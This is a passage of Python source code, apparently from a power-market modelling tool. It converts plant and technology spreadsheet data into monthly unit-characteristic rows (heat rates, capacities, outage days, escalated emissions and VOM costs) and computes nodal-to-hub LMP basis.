    if pd.isnull(outage_start_date) or pd.isnull(outage_end_date):
        return 0
    # Re-anchor the outage window to the period's year (month/day only matter).
    outage_start_date = date(period.year, outage_start_date.month, outage_start_date.day)
    outage_end_date = date(period.year, outage_end_date.month, outage_end_date.day)
    if outage_start_date > period or outage_end_date < period_start:
        return 0
    # Clamp the outage window to the month and count inclusive days.
    overlap_start = max(outage_start_date, period_start)
    overlap_end = min(outage_end_date, period)
    return (overlap_end - overlap_start).days + 1
def get_escalated_value(value, escalation, period, base_year=2020):
    """Escalate a base-year value at a compound annual rate to the period's year.

    Args:
        value: value stated in base_year dollars/units.
        escalation: annual escalation rate (e.g. 0.02 for 2%/yr).
        period: date-like object exposing a .year attribute.
        base_year: year in which `value` is stated. Defaults to 2020, the
            previously hard-coded base, so existing callers are unchanged.

    Returns:
        value * (1 + escalation) ** (period.year - base_year). Years before
        base_year are de-escalated (negative exponent).
    """
    return value * (1 + escalation) ** (period.year - base_year)
def convert_uc(plant_tech_master_file, scenario, version, start_date, end_date, escalation=0.02):
    """Flatten the 'Simple UC' and 'Tech' sheets of the plant/tech master
    workbook into a long (entity, period, characteristic, value/value_str)
    frame shaped for the kean pcuc table.

    Args:
        plant_tech_master_file: path to the master Excel workbook.
        scenario, version: tags stamped onto every output row.
        start_date, end_date: bounds of the monthly horizon, expanded into
            one row per month via get_month_list.
        escalation: annual rate applied to emissions and VOM values
            (base year 2020 — see get_escalated_value).

    Returns:
        DataFrame with one row per (plant, month, characteristic); numeric
        characteristics use 'value', text ones use 'value_str'.
    """
    simple_uc_df = pd.read_excel(plant_tech_master_file, sheet_name='Simple UC')
    tech_df = pd.read_excel(plant_tech_master_file, sheet_name='Tech')
    month_list = get_month_list(start_date, end_date)
    # for month in month_list:
    #     print (month)
    # Each plant row picks up its technology defaults via a left join on Tech.
    merged_simple_uc_df = pd.merge(simple_uc_df, tech_df, on='Tech', how="left")
    # merged_simple_uc_df.to_csv("merged_simple_uc_df.csv")
    ready_to_kean_pcuc_df = pd.DataFrame()
    for index, row in merged_simple_uc_df.iterrows():
        plant_name = row['Plant']
        total_plant_temp_df = pd.DataFrame()
        temp_ready_to_kean_df = pd.DataFrame(data=month_list, columns=['period'])
        # NOTE(review): every *_temp_ready_to_kean_df below is an ALIAS of this
        # same frame (no .copy()); each section overwrites the shared
        # characteristic/value/value_str columns in place. This only works
        # because DataFrame.append copies the data when each section's
        # snapshot is appended to total_plant_temp_df.
        """ emissions """
        # $ per MWh adder: carbon cost ($/Ton) * rate (lb/MMBtu) / 2000 lb per
        # short ton (units taken from the column headers); escalated per year.
        emissions = row['Carbon Cost ($/Ton)'] * row['Emissions Rate (lb/MMBtu)'] / 2000.0
        emissions_temp_ready_to_kean_df = temp_ready_to_kean_df
        emissions_temp_ready_to_kean_df['characteristic'] = 'emissions'
        emissions_temp_ready_to_kean_df['value'] = emissions_temp_ready_to_kean_df.apply(lambda row: get_escalated_value(emissions, escalation, row['period']), axis=1)
        emissions_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(emissions_temp_ready_to_kean_df)
        """ forced_outage_value """
        forced_outage_value = row['UOF']
        fov_temp_ready_to_kean_df = temp_ready_to_kean_df
        fov_temp_ready_to_kean_df['characteristic'] = 'forced_outage_value'
        fov_temp_ready_to_kean_df['value'] = forced_outage_value
        fov_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(fov_temp_ready_to_kean_df)
        """ fuel_transport """
        # NOTE: single annual basis here; convert_uc_dataframe uses
        # seasonal summer/winter fuel basis instead.
        fuel_transport = row['Fuel Basis ($/MMBtu)']
        ftp_temp_ready_to_kean_df = temp_ready_to_kean_df
        ftp_temp_ready_to_kean_df['characteristic'] = 'fuel_transport'
        ftp_temp_ready_to_kean_df['value'] = fuel_transport
        ftp_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(ftp_temp_ready_to_kean_df)
        """ fuel_type """
        fuel_type = row['Fuel Type']
        ft_temp_ready_to_kean_df = temp_ready_to_kean_df
        ft_temp_ready_to_kean_df['characteristic'] = 'fuel_type'
        ft_temp_ready_to_kean_df['value'] = 0.0
        ft_temp_ready_to_kean_df['value_str'] = fuel_type
        total_plant_temp_df = total_plant_temp_df.append(ft_temp_ready_to_kean_df)
        """ gas_instrument_id """
        gas_instrument_id = row['Fuel Hub']
        gii_temp_ready_to_kean_df = temp_ready_to_kean_df
        gii_temp_ready_to_kean_df['characteristic'] = 'gas_instrument_id'
        gii_temp_ready_to_kean_df['value'] = 0.0
        gii_temp_ready_to_kean_df['value_str'] = gas_instrument_id
        total_plant_temp_df = total_plant_temp_df.append(gii_temp_ready_to_kean_df)
        """ heatrate_high_load """
        heatrate_high_load_summer = row['Summer Base Heat Rate']
        heatrate_high_load_winter = row['Winter Base Heat Rate']
        hhl_temp_ready_to_kean_df = temp_ready_to_kean_df
        hhl_temp_ready_to_kean_df['value'] = hhl_temp_ready_to_kean_df.apply(lambda row: get_hr(row, heatrate_high_load_summer, heatrate_high_load_winter), axis=1)
        hhl_temp_ready_to_kean_df['characteristic'] = 'heatrate_high_load'
        hhl_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(hhl_temp_ready_to_kean_df)
        """ heatrate_max_load """
        heatrate_max_load_summer = row['Summer Duct Heat Rate']
        heatrate_max_load_winter = row['Winter Duct Heat Rate']
        hml_temp_ready_to_kean_df = temp_ready_to_kean_df
        hml_temp_ready_to_kean_df['value'] = hml_temp_ready_to_kean_df.apply(lambda row: get_hr(row, heatrate_max_load_summer, heatrate_max_load_winter), axis=1)
        hml_temp_ready_to_kean_df['characteristic'] = 'heatrate_max_load'
        hml_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(hml_temp_ready_to_kean_df)
        """ heatrate_min_load """
        # Minimum-load heat rate = base heat rate scaled by the lower
        # operating limit multiplier.
        heatrate_min_load_summer = row['Summer Base Heat Rate'] * row['Lower Operating Limit - Summer Heat Rate']
        heatrate_min_load_winter = row['Winter Base Heat Rate'] * row['Lower Operating Limit - Winter Heat Rate']
        hminl_temp_ready_to_kean_df = temp_ready_to_kean_df
        hminl_temp_ready_to_kean_df['value'] = hminl_temp_ready_to_kean_df.apply(lambda row: get_hr(row, heatrate_min_load_summer, heatrate_min_load_winter), axis=1)
        hminl_temp_ready_to_kean_df['characteristic'] = 'heatrate_min_load'
        hminl_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(hminl_temp_ready_to_kean_df)
        """ high_load """
        high_load_summer = row['Summer Base Capacity']
        high_load_winter = row['Winter Base Capacity']
        hl_temp_ready_to_kean_df = temp_ready_to_kean_df
        hl_temp_ready_to_kean_df['value'] = hl_temp_ready_to_kean_df.apply(lambda row: get_load(row, high_load_summer, high_load_winter), axis=1)
        hl_temp_ready_to_kean_df['characteristic'] = 'high_load'
        hl_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(hl_temp_ready_to_kean_df)
        """ max_load """
        max_load_summer = row['Summer Duct Capacity']
        max_load_winter = row['Winter Duct Capacity']
        ml_temp_ready_to_kean_df = temp_ready_to_kean_df
        ml_temp_ready_to_kean_df['value'] = ml_temp_ready_to_kean_df.apply(lambda row: get_load(row, max_load_summer, max_load_winter), axis=1)
        ml_temp_ready_to_kean_df['characteristic'] = 'max_load'
        ml_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(ml_temp_ready_to_kean_df)
        """ min_load """
        min_load_summer = row['Summer Base Capacity'] * row['Lower Operating Limit - Capacity']
        min_load_winter = row['Winter Base Capacity'] * row['Lower Operating Limit - Capacity']
        ml_temp_ready_to_kean_df = temp_ready_to_kean_df
        ml_temp_ready_to_kean_df['value'] = ml_temp_ready_to_kean_df.apply(lambda row: get_load(row, min_load_summer, min_load_winter), axis=1)
        ml_temp_ready_to_kean_df['characteristic'] = 'min_load'
        ml_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(ml_temp_ready_to_kean_df)
        """ offpeak_power_hub_instrument_id """
        offpeak_power_hub_instrument_id = row['Power Hub - Off Peak']
        oph_temp_ready_to_kean_df = temp_ready_to_kean_df
        oph_temp_ready_to_kean_df['value_str'] = offpeak_power_hub_instrument_id
        oph_temp_ready_to_kean_df['value'] = 0.0
        oph_temp_ready_to_kean_df['characteristic'] = 'offpeak_power_hub_instrument_id'
        total_plant_temp_df = total_plant_temp_df.append(oph_temp_ready_to_kean_df)
        """ onpeak_power_hub_instrument_id """
        onpeak_power_hub_instrument_id = row['Power Hub - On Peak']
        onph_temp_ready_to_kean_df = temp_ready_to_kean_df
        onph_temp_ready_to_kean_df['value_str'] = onpeak_power_hub_instrument_id
        onph_temp_ready_to_kean_df['value'] = 0.0
        onph_temp_ready_to_kean_df['characteristic'] = 'onpeak_power_hub_instrument_id'
        total_plant_temp_df = total_plant_temp_df.append(onph_temp_ready_to_kean_df)
        """ outage_days """
        outage_start_date = row['Planned Outage Start Date']
        outage_end_date = row['Planned Outage End Date']
        od_temp_ready_to_kean_df = temp_ready_to_kean_df
        od_temp_ready_to_kean_df['value'] = od_temp_ready_to_kean_df.apply(lambda row: get_outage_days(row, outage_start_date, outage_end_date), axis=1)
        od_temp_ready_to_kean_df['value_str'] = ''
        od_temp_ready_to_kean_df['characteristic'] = 'outage_days'
        total_plant_temp_df = total_plant_temp_df.append(od_temp_ready_to_kean_df)
        """ dafault to 0s """
        # Ramp characteristics not modelled by the simple UC sheet default to 0.
        for char in ['ramp_dowm_cold_hours', 'ramp_down_warm_hours', 'ramp_energy_cold', 'ramp_energy_warm', 'ramp_fuel_warm', 'ramp_up_warm_hours']:
            temp_char_df = temp_ready_to_kean_df
            temp_char_df['value'] = 0.0
            temp_char_df['value_str'] = ''
            temp_char_df['characteristic'] = char
            total_plant_temp_df = total_plant_temp_df.append(temp_char_df)
        """ ramp_fuel_cold """
        # Cold-start fuel (MMBtu) = per-MW start fuel * seasonal duct capacity.
        ramp_fuel_cold_summer = row['Start Fuel (MMBtu/MW)'] * row['Summer Duct Capacity']
        ramp_fuel_cold_winter = row['Start Fuel (MMBtu/MW)'] * row['Winter Duct Capacity']
        rfc_temp_ready_to_kean_df = temp_ready_to_kean_df
        rfc_temp_ready_to_kean_df['value'] = rfc_temp_ready_to_kean_df.apply(lambda row: get_load(row, ramp_fuel_cold_summer, ramp_fuel_cold_winter), axis=1)
        rfc_temp_ready_to_kean_df['value_str'] = ''
        rfc_temp_ready_to_kean_df['characteristic'] = 'ramp_fuel_cold'
        total_plant_temp_df = total_plant_temp_df.append(rfc_temp_ready_to_kean_df)
        """ ramp_up_cold_hours """
        ramp_up_cold_hours = row['Start Hours']
        ruch_temp_ready_to_kean_df = temp_ready_to_kean_df
        ruch_temp_ready_to_kean_df['value'] = ramp_up_cold_hours
        ruch_temp_ready_to_kean_df['value_str'] = ''
        ruch_temp_ready_to_kean_df['characteristic'] = 'ramp_up_cold_hours'
        # NOTE(review): appends rfc_... rather than ruch_...; harmless only
        # because both names alias the same frame (see aliasing note above),
        # but ruch_temp_ready_to_kean_df was presumably intended.
        total_plant_temp_df = total_plant_temp_df.append(rfc_temp_ready_to_kean_df)
        """ start_cost """
        start_cost_summer = row['Start Expense ($/MW)'] * row['Summer Duct Capacity']
        start_cost_winter = row['Start Expense ($/MW)'] * row['Winter Duct Capacity']
        sc_temp_ready_to_kean_df = temp_ready_to_kean_df
        sc_temp_ready_to_kean_df['value'] = sc_temp_ready_to_kean_df.apply(lambda row: get_load(row, start_cost_summer, start_cost_winter), axis=1)
        sc_temp_ready_to_kean_df['value_str'] = ''
        sc_temp_ready_to_kean_df['characteristic'] = 'start_cost'
        total_plant_temp_df = total_plant_temp_df.append(sc_temp_ready_to_kean_df)
        """ units """
        u_temp_char_df = temp_ready_to_kean_df
        u_temp_char_df['value'] = 1
        u_temp_char_df['value_str'] = ''
        u_temp_char_df['characteristic'] = 'units'
        total_plant_temp_df = total_plant_temp_df.append(u_temp_char_df)
        """ vom_high_load vom_max_load vom_min_load """
        # The same escalated VOM is reported at all three load levels.
        vom = row['VOM']
        for char in ['vom_high_load', 'vom_max_load', 'vom_min_load']:
            temp_char_df = temp_ready_to_kean_df
            temp_char_df['value'] = temp_char_df.apply(lambda row: get_escalated_value(vom, escalation, row['period']), axis=1)
            temp_char_df['value_str'] = ''
            temp_char_df['characteristic'] = char
            total_plant_temp_df = total_plant_temp_df.append(temp_char_df)
        # Stamp identity columns on the assembled per-plant frame.
        total_plant_temp_df['entity'] = plant_name
        total_plant_temp_df['unit'] = 'all'
        total_plant_temp_df['scenario'] = scenario
        total_plant_temp_df['version'] = version
        ready_to_kean_pcuc_df = ready_to_kean_pcuc_df.append(total_plant_temp_df)
    return ready_to_kean_pcuc_df
def convert_uc_dataframe(powerplant_df, technology_df, scenario, version, start_date, end_date, escalation=0.02):
    """Database-schema variant of convert_uc: flatten already-loaded
    powerplant/technology frames (lowercase kean column names, see
    load_pp_tech_info) into the long (entity, period, characteristic,
    value/value_str) pcuc layout.

    Differences from convert_uc: seasonal summer/winter fuel basis instead of
    a single annual basis, and a 2205 lb/metric-ton divisor for CAISO
    emissions (2000 lb/short-ton elsewhere).

    Args:
        powerplant_df, technology_df: frames as returned by load_pp_tech_info.
        scenario, version: tags stamped onto every output row.
        start_date, end_date: monthly horizon bounds (via get_month_list).
        escalation: annual rate applied to emissions and VOM values.

    Returns:
        DataFrame with one row per (plant, month, characteristic).
    """
    month_list = get_month_list(start_date, end_date)
    # Plant rows pick up technology defaults; the join renames the plant's
    # 'name' to 'name_x' (tech 'name' becomes 'name_y').
    merged_simple_uc_df = pd.merge(powerplant_df, technology_df, left_on='technology', right_on='name', how="left")
    ready_to_kean_pcuc_df = pd.DataFrame()
    for index, row in merged_simple_uc_df.iterrows():
        plant_name = row['name_x']
        total_plant_temp_df = pd.DataFrame()
        temp_ready_to_kean_df = pd.DataFrame(data=month_list, columns=['period'])
        # NOTE(review): every *_temp_ready_to_kean_df below is an ALIAS of this
        # same frame (no .copy()); sections overwrite the shared columns in
        # place, and correctness relies on DataFrame.append copying the data
        # at each append.
        """ emissions """
        emissions = row['carbon_cost'] * row['emissions_rate'] / 2000.0
        # CAISO carbon is priced per metric ton (2205 lb), not short ton.
        if row['market'] == 'CAISO':
            emissions = row['carbon_cost'] * row['emissions_rate'] / 2205.0
        emissions_temp_ready_to_kean_df = temp_ready_to_kean_df
        emissions_temp_ready_to_kean_df['characteristic'] = 'emissions'
        emissions_temp_ready_to_kean_df['value'] = emissions_temp_ready_to_kean_df.apply(lambda row: get_escalated_value(emissions, escalation, row['period']), axis=1)
        emissions_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(emissions_temp_ready_to_kean_df)
        """ forced_outage_value """
        forced_outage_value = row['uof']
        fov_temp_ready_to_kean_df = temp_ready_to_kean_df
        fov_temp_ready_to_kean_df['characteristic'] = 'forced_outage_value'
        fov_temp_ready_to_kean_df['value'] = forced_outage_value
        fov_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(fov_temp_ready_to_kean_df)
        """ fuel_transport """
        fuel_transport_summer = row['summer_fuel_basis']
        fuel_transport_winter = row['winter_fuel_basis']
        ftp_temp_ready_to_kean_df = temp_ready_to_kean_df
        ftp_temp_ready_to_kean_df['characteristic'] = 'fuel_transport'
        ftp_temp_ready_to_kean_df['value'] = ftp_temp_ready_to_kean_df.apply(lambda row: get_load(row, fuel_transport_summer, fuel_transport_winter), axis=1)
        ftp_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(ftp_temp_ready_to_kean_df)
        """ fuel_type """
        fuel_type = row['fuel_type']
        ft_temp_ready_to_kean_df = temp_ready_to_kean_df
        ft_temp_ready_to_kean_df['characteristic'] = 'fuel_type'
        ft_temp_ready_to_kean_df['value'] = 0.0
        ft_temp_ready_to_kean_df['value_str'] = fuel_type
        total_plant_temp_df = total_plant_temp_df.append(ft_temp_ready_to_kean_df)
        """ gas_instrument_id """
        gas_instrument_id = row['fuel_hub']
        gii_temp_ready_to_kean_df = temp_ready_to_kean_df
        gii_temp_ready_to_kean_df['characteristic'] = 'gas_instrument_id'
        gii_temp_ready_to_kean_df['value'] = 0.0
        gii_temp_ready_to_kean_df['value_str'] = gas_instrument_id
        total_plant_temp_df = total_plant_temp_df.append(gii_temp_ready_to_kean_df)
        """ heatrate_high_load """
        heatrate_high_load_summer = row['summer_base_heatrate']
        heatrate_high_load_winter = row['winter_base_heatrate']
        hhl_temp_ready_to_kean_df = temp_ready_to_kean_df
        hhl_temp_ready_to_kean_df['value'] = hhl_temp_ready_to_kean_df.apply(lambda row: get_hr(row, heatrate_high_load_summer, heatrate_high_load_winter), axis=1)
        hhl_temp_ready_to_kean_df['characteristic'] = 'heatrate_high_load'
        hhl_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(hhl_temp_ready_to_kean_df)
        """ heatrate_max_load """
        heatrate_max_load_summer = row['summer_duct_heatrate']
        heatrate_max_load_winter = row['winter_duct_heatrate']
        hml_temp_ready_to_kean_df = temp_ready_to_kean_df
        hml_temp_ready_to_kean_df['value'] = hml_temp_ready_to_kean_df.apply(lambda row: get_hr(row, heatrate_max_load_summer, heatrate_max_load_winter), axis=1)
        hml_temp_ready_to_kean_df['characteristic'] = 'heatrate_max_load'
        hml_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(hml_temp_ready_to_kean_df)
        """ heatrate_min_load """
        # Minimum-load heat rate = base heat rate * lower-operating-limit multiplier.
        heatrate_min_load_summer = row['summer_base_heatrate'] * row['lol_summer_heatrate']
        heatrate_min_load_winter = row['winter_base_heatrate'] * row['lol_winter_heatrate']
        hminl_temp_ready_to_kean_df = temp_ready_to_kean_df
        hminl_temp_ready_to_kean_df['value'] = hminl_temp_ready_to_kean_df.apply(lambda row: get_hr(row, heatrate_min_load_summer, heatrate_min_load_winter), axis=1)
        hminl_temp_ready_to_kean_df['characteristic'] = 'heatrate_min_load'
        hminl_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(hminl_temp_ready_to_kean_df)
        """ high_load """
        high_load_summer = row['summer_base_capacity']
        high_load_winter = row['winter_base_capacity']
        hl_temp_ready_to_kean_df = temp_ready_to_kean_df
        hl_temp_ready_to_kean_df['value'] = hl_temp_ready_to_kean_df.apply(lambda row: get_load(row, high_load_summer, high_load_winter), axis=1)
        hl_temp_ready_to_kean_df['characteristic'] = 'high_load'
        hl_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(hl_temp_ready_to_kean_df)
        """ max_load """
        max_load_summer = row['summer_duct_capacity']
        max_load_winter = row['winter_duct_capacity']
        ml_temp_ready_to_kean_df = temp_ready_to_kean_df
        ml_temp_ready_to_kean_df['value'] = ml_temp_ready_to_kean_df.apply(lambda row: get_load(row, max_load_summer, max_load_winter), axis=1)
        ml_temp_ready_to_kean_df['characteristic'] = 'max_load'
        ml_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(ml_temp_ready_to_kean_df)
        """ min_load """
        min_load_summer = row['summer_base_capacity'] * row['lol_capacity']
        min_load_winter = row['winter_base_capacity'] * row['lol_capacity']
        ml_temp_ready_to_kean_df = temp_ready_to_kean_df
        ml_temp_ready_to_kean_df['value'] = ml_temp_ready_to_kean_df.apply(lambda row: get_load(row, min_load_summer, min_load_winter), axis=1)
        ml_temp_ready_to_kean_df['characteristic'] = 'min_load'
        ml_temp_ready_to_kean_df['value_str'] = ''
        total_plant_temp_df = total_plant_temp_df.append(ml_temp_ready_to_kean_df)
        """ offpeak_power_hub_instrument_id """
        offpeak_power_hub_instrument_id = row['power_hub_off_peak']
        oph_temp_ready_to_kean_df = temp_ready_to_kean_df
        oph_temp_ready_to_kean_df['value_str'] = offpeak_power_hub_instrument_id
        oph_temp_ready_to_kean_df['value'] = 0.0
        oph_temp_ready_to_kean_df['characteristic'] = 'offpeak_power_hub_instrument_id'
        total_plant_temp_df = total_plant_temp_df.append(oph_temp_ready_to_kean_df)
        """ onpeak_power_hub_instrument_id """
        onpeak_power_hub_instrument_id = row['power_hub_on_peak']
        onph_temp_ready_to_kean_df = temp_ready_to_kean_df
        onph_temp_ready_to_kean_df['value_str'] = onpeak_power_hub_instrument_id
        onph_temp_ready_to_kean_df['value'] = 0.0
        onph_temp_ready_to_kean_df['characteristic'] = 'onpeak_power_hub_instrument_id'
        total_plant_temp_df = total_plant_temp_df.append(onph_temp_ready_to_kean_df)
        """ outage_days """
        outage_start_date = row['first_plan_outage_start']
        outage_end_date = row['first_plan_outage_end']
        od_temp_ready_to_kean_df = temp_ready_to_kean_df
        od_temp_ready_to_kean_df['value'] = od_temp_ready_to_kean_df.apply(lambda row: get_outage_days(row, outage_start_date, outage_end_date), axis=1)
        od_temp_ready_to_kean_df['value_str'] = ''
        od_temp_ready_to_kean_df['characteristic'] = 'outage_days'
        total_plant_temp_df = total_plant_temp_df.append(od_temp_ready_to_kean_df)
        """ dafault to 0s """
        # Ramp characteristics not modelled by the simple UC inputs default to 0.
        for char in ['ramp_dowm_cold_hours', 'ramp_down_warm_hours', 'ramp_energy_cold', 'ramp_energy_warm', 'ramp_fuel_warm', 'ramp_up_warm_hours']:
            temp_char_df = temp_ready_to_kean_df
            temp_char_df['value'] = 0.0
            temp_char_df['value_str'] = ''
            temp_char_df['characteristic'] = char
            total_plant_temp_df = total_plant_temp_df.append(temp_char_df)
        """ ramp_fuel_cold """
        # Cold-start fuel (MMBtu) = per-MW start fuel * seasonal duct capacity.
        ramp_fuel_cold_summer = row['start_fuel'] * row['summer_duct_capacity']
        ramp_fuel_cold_winter = row['start_fuel'] * row['winter_duct_capacity']
        rfc_temp_ready_to_kean_df = temp_ready_to_kean_df
        rfc_temp_ready_to_kean_df['value'] = rfc_temp_ready_to_kean_df.apply(lambda row: get_load(row, ramp_fuel_cold_summer, ramp_fuel_cold_winter), axis=1)
        rfc_temp_ready_to_kean_df['value_str'] = ''
        rfc_temp_ready_to_kean_df['characteristic'] = 'ramp_fuel_cold'
        total_plant_temp_df = total_plant_temp_df.append(rfc_temp_ready_to_kean_df)
        """ ramp_up_cold_hours """
        ramp_up_cold_hours = row['start_hours']
        ruch_temp_ready_to_kean_df = temp_ready_to_kean_df
        ruch_temp_ready_to_kean_df['value'] = ramp_up_cold_hours
        ruch_temp_ready_to_kean_df['value_str'] = ''
        ruch_temp_ready_to_kean_df['characteristic'] = 'ramp_up_cold_hours'
        # NOTE(review): appends rfc_... rather than ruch_...; harmless only
        # because both names alias the same frame (see aliasing note above),
        # but ruch_temp_ready_to_kean_df was presumably intended.
        total_plant_temp_df = total_plant_temp_df.append(rfc_temp_ready_to_kean_df)
        """ start_cost """
        start_cost_summer = row['start_expense'] * row['summer_duct_capacity']
        start_cost_winter = row['start_expense'] * row['winter_duct_capacity']
        sc_temp_ready_to_kean_df = temp_ready_to_kean_df
        sc_temp_ready_to_kean_df['value'] = sc_temp_ready_to_kean_df.apply(lambda row: get_load(row, start_cost_summer, start_cost_winter), axis=1)
        sc_temp_ready_to_kean_df['value_str'] = ''
        sc_temp_ready_to_kean_df['characteristic'] = 'start_cost'
        total_plant_temp_df = total_plant_temp_df.append(sc_temp_ready_to_kean_df)
        """ units """
        u_temp_char_df = temp_ready_to_kean_df
        u_temp_char_df['value'] = 1
        u_temp_char_df['value_str'] = ''
        u_temp_char_df['characteristic'] = 'units'
        total_plant_temp_df = total_plant_temp_df.append(u_temp_char_df)
        """ vom_high_load vom_max_load vom_min_load """
        # The same escalated VOM is reported at all three load levels.
        vom = row['vom']
        for char in ['vom_high_load', 'vom_max_load', 'vom_min_load']:
            temp_char_df = temp_ready_to_kean_df
            temp_char_df['value'] = temp_char_df.apply(lambda row: get_escalated_value(vom, escalation, row['period']), axis=1)
            temp_char_df['value_str'] = ''
            temp_char_df['characteristic'] = char
            total_plant_temp_df = total_plant_temp_df.append(temp_char_df)
        # Stamp identity columns on the assembled per-plant frame.
        total_plant_temp_df['entity'] = plant_name
        total_plant_temp_df['unit'] = 'all'
        total_plant_temp_df['scenario'] = scenario
        total_plant_temp_df['version'] = version
        ready_to_kean_pcuc_df = ready_to_kean_pcuc_df.append(total_plant_temp_df)
    return ready_to_kean_pcuc_df
def load_pp_tech_info(plant_tech_master_file):
    """Load the plant/tech master workbook and return two frames renamed to
    the kean database column schema.

    Powerplant rows get a far-future default retirement date when blank,
    empty second-outage columns, and fixed effective start/end dates. Tech
    numeric columns have NaNs replaced with 0.0; the 'name' column is
    protected from the fill by temporarily making it the index.

    Returns:
        (powerplant_df, technology_df)
    """
    pp_df = pd.read_excel(plant_tech_master_file, sheet_name='Simple UC')
    technology_df = pd.read_excel(plant_tech_master_file, sheet_name='Tech')

    # --- powerplant table ---
    pp_column_map = {'Plant':'name',
                     'Tech':'technology',
                     'Fuel Type':'fuel_type',
                     'Market':'market',
                     'Power Hub/Zone':'power_zone',
                     'Power Hub - On Peak':'power_hub_on_peak',
                     'Power Hub - Off Peak':'power_hub_off_peak',
                     'Power Hub - SNL':'power_hub',
                     'Node':'node',
                     'Fuel Zone':'fuel_zone',
                     'Fuel Hub':'fuel_hub',
                     'Summer Fuel Basis ($/MMBtu)':'summer_fuel_basis',
                     'Winter Fuel Basis ($/MMBtu)':'winter_fuel_basis',
                     'Summer Duct Capacity':'summer_duct_capacity',
                     'Summer Base Capacity':'summer_base_capacity',
                     'Winter Duct Capacity':'winter_duct_capacity',
                     'Winter Base Capacity':'winter_base_capacity',
                     'Planned Outage Start Date':'first_plan_outage_start',
                     'Planned Outage End Date':'first_plan_outage_end',
                     'Carbon Cost ($/Ton)':'carbon_cost',
                     'Retirement Date':'retirement_date',
                     'Ownership':'ownership',
                     'Source Notes':'source_notes'}
    pp_df.rename(columns=pp_column_map, inplace=True)
    # Blank retirement dates mean "never retires" -> far-future sentinel.
    pp_df['retirement_date'] = pp_df.apply(
        lambda row: date(2099,12,31) if pd.isnull(row['retirement_date']) else row['retirement_date'], axis=1)
    pp_df['second_plan_outage_start'] = ''
    pp_df['second_plan_outage_end'] = ''
    pp_df['effective_start'] = date(2000,1,1)
    pp_df['effective_end'] = date(2099,12,31)

    # --- technology table ---
    tech_column_map = {'Tech': 'name',
                       'Summer Duct Heat Rate': 'summer_duct_heatrate',
                       'Summer Base Heat Rate': 'summer_base_heatrate',
                       'Winter Duct Heat Rate': 'winter_duct_heatrate',
                       'Winter Base Heat Rate': 'winter_base_heatrate',
                       'Lower Operating Limit - Capacity': 'lol_capacity',
                       'Lower Operating Limit - Summer Heat Rate': 'lol_summer_heatrate',
                       'Lower Operating Limit - Winter Heat Rate': 'lol_winter_heatrate',
                       'Start Expense ($/MW)': 'start_expense',
                       'Start Fuel (MMBtu/MW)': 'start_fuel',
                       'Start Hours': 'start_hours',
                       'Emissions Rate (lb/MMBtu)': 'emissions_rate',
                       'VOM': 'vom',
                       'UOF': 'uof'}
    technology_df.rename(columns=tech_column_map, inplace=True)
    technology_df = technology_df.set_index('name')
    technology_df.fillna(0.0, inplace=True)
    technology_df = technology_df.reset_index()

    return pp_df, technology_df
def get_match_signal(row):
    """Label a merged hub/nodal row: 'Matched' when both LMPs are present,
    'Not matched' when either side is NaN."""
    both_present = not (np.isnan(row['total_lmp_x']) or np.isnan(row['total_lmp_y']))
    return 'Matched' if both_present else 'Not matched'
def get_month(row):
    """Return the calendar month (1-12) of the row's delivery_date."""
    delivery = row['delivery_date']
    return delivery.month
def calculate_basis(nodal_market, nodal_id, hub_market, hub_id, start_date, end_date, dart, plant_name):
    """Compute hourly and monthly on/off-peak nodal-to-hub basis for a plant.

    Pulls historical LMPs for the node and the hub, joins them hour by hour,
    and derives $ and % basis. Hours where the % basis exceeds +/-50% are
    treated as bad data and blanked; infinities (hub price of 0) become 0.0.

    Returns:
        (monthly_onoffpeak_basis_df, hourly_df): mean basis by
        (month, peak_info), plus the full hourly detail frame.
    """
    node_prices = get_historical_lmp(nodal_market, nodal_id, start_date, end_date, dart)
    hub_prices = get_historical_lmp(hub_market, hub_id, start_date, end_date, dart)
    print ("------------------------------------------------")
    print (nodal_market, nodal_id, len(node_prices))
    print (hub_market, hub_id, len(hub_prices))
    hourly = pd.merge(node_prices, hub_prices, on=['delivery_date','hour_ending'], how='inner')
    hourly['signal'] = hourly.apply(lambda row: get_match_signal(row), axis=1)
    hourly.rename(columns={'total_lmp_x':'nodal_lmp','total_lmp_y':'hub_lmp', 'peak_info_x': 'peak_info'}, inplace=True)
    hourly['month'] = hourly.apply(lambda row: get_month(row), axis=1)
    hourly = hourly[['delivery_date','hour_ending', 'month', 'nodal_lmp','hub_lmp','signal', 'peak_info']]
    hourly['basis_$'] = (hourly['nodal_lmp'] - hourly['hub_lmp'])
    hourly['basis_%'] = (hourly['nodal_lmp'] - hourly['hub_lmp']) / hourly['hub_lmp']
    # Blank out hours whose % basis looks like bad data (beyond +/-50%).
    hourly['basis_$'] = hourly.apply(lambda row: np.nan if abs(row['basis_%']) > 0.5 else row['basis_$'], axis=1)
    hourly['basis_%'] = hourly.apply(lambda row: np.nan if abs(row['basis_%']) > 0.5 else row['basis_%'], axis=1)
    hourly = hourly.replace([np.inf, -np.inf], 0.0)
    hourly['plant'] = plant_name
    monthly_basis = hourly.groupby(['month','peak_info'])[['basis_$','basis_%']].mean()
    monthly_basis['plant'] = plant_name
    return monthly_basis, hourly
